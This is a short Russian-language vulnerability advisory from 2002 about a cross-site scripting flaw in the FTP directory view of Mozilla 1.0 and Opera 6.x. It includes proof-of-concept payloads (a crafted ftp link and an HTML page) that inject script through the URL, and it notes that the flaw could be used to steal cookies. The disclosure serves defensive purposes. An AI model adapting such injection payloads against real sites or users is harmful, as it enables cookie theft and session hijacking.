Межсайтовый скриптинг в Mozilla и Opera

Дата публикации:
07.08.2002
Всего просмотров:
1120
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Обнаруженная ошибка в 'FTP view' в Mozilla и Opera позволяет вставлять произвольный код сценария, который не будет отфильтрован при просмотре содержимого FTP папки. В случае, когда Ftp сервер имеет тот же самый адрес, что и у HTTP сервера, уязвимость может использоваться для захвата чужих куки.

Эксплоит для в Mozilla:

<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3E
alert(%22exploit%22);%3C%2fscript%3E">Exploit</a>
Эксплоит для в Opera:
<html>
<head>
<META http-equiv="Refresh" content="5 ; 
url=ftp://%3c%2ftitle%3e%3cscript%3e
alert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>
уязвимость обнаружена в Opera 6.03, 6.04 и Mozilla 1.0

Ссылки: Mozilla FTP View Cross-Site Scripting Vulnerability
Opera FTP View Cross-Site Scripting Vulnerability
или введите имя

CAPTCHA